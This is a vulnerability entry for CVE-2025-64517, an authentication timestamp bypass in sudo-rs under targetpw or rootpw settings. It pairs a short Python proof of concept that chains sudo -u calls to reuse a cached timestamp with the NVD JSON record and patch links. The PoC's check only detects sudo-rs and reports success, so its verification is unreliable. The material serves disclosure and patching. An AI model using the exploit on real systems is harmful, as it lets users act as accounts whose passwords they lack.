CVE-2025-64517

# CVE-2025-64517 PoC - sudo-rs Authentication Timestamp Bypass # Environment: sudo-rs 0.2.5-0.2.9 with Defaults targetpw or rootpw configured # Attack Goal: Bypass authentication to run commands as other users import subprocess import time def exploit_cve_2025_64517(): """ Exploitation steps: 1. Attacker knows password for user A 2. Policy allows user A to run commands as user B 3. Attacker runs: sudo -u userB command 4. System prompts for user A's password (due to targetpw) 5. Attacker enters user A's password, command executes as userB 6. Timestamp records user A's UID instead of userB's UID 7. Attacker runs another command as userB 8. System uses cached timestamp, bypasses authentication """ # Step 1: Initial authentication with targetpw # This authenticates with userA's password but timestamp records userA's UID subprocess.run(['sudo', '-u', 'userB', '-k']) # Clear timestamp result1 = subprocess.run(['sudo', '-u', 'userB', 'id'], capture_output=True) # Expected: Prompts for password, executes as userB # Step 2: Subsequent command bypasses authentication # Timestamp still valid, system uses userA's UID from timestamp result2 = subprocess.run(['sudo', '-u', 'userB', 'whoami'], capture_output=True) # Expected: No password prompt, executes as userB return result1, result2 def verify_vulnerability(): """ Verification: Check if second sudo call prompts for password If no prompt: vulnerability exists If prompt: vulnerability patched """ print("Testing CVE-2025-64517...") print("If timestamp bypass works, second command should not require password") # Check sudo-rs version result = subprocess.run(['sudo', '--version'], capture_output=True, text=True) if 'sudo-rs' in result.stdout: print("sudo-rs detected") return True if __name__ == '__main__': verify_vulnerability()

{"cve": {"id": "CVE-2025-64517", "sourceIdentifier": "[email protected]", "published": "2025-11-12T22:15:50.460", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "sudo-rs is a memory safe implementation of sudo and su written in Rust. With `Defaults targetpw` (or `Defaults rootpw`) enabled, the password of the target account (or root account) instead of the invoking user is used for authentication. sudo-rs starting in version 0.2.5 and prior to version 0.2.10 incorrectly recorded the invoking user’s UID instead of the authenticated-as user's UID in the authentication timestamp. Any later `sudo` invocation on the same terminal while the timestamp was still valid would use that timestamp, potentially bypassing new authentication even if the policy would have required it. A highly-privileged user (able to run commands as other users, or as root, through sudo) who knows one password of an account they are allowed to run commands as, would be able to run commands as any other account the policy permits them to run commands for, even if they don't know the password for those accounts. A common instance of this would be that a user can still use their own password to run commands as root (the default behaviour of `sudo`), effectively negating the intended behaviour of the `targetpw` or `rootpw` options. Version 0.2.10 contains a patch for the issue. Versions prior to 0.2.5 are not affected, since they do not offer `Defaults targetpw` or `Defaults rootpw`."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "references": [{"url": "https://github.com/trifectatechfoundation/sudo-rs/commit/8423fd986c3fa58b357f238c0db5e54baca5255d.", "source": "[email protected]"}, {"url": "https://github.com/trifectatechfoundation/sudo-rs/releases/tag/v0.2.10", "source": "[email protected]"}, {"url": "https://github.com/trifectatechfoundation/sudo-rs/security/advisories/GHSA-q428-6v73-fc4q", "source": "[email protected]"}]}}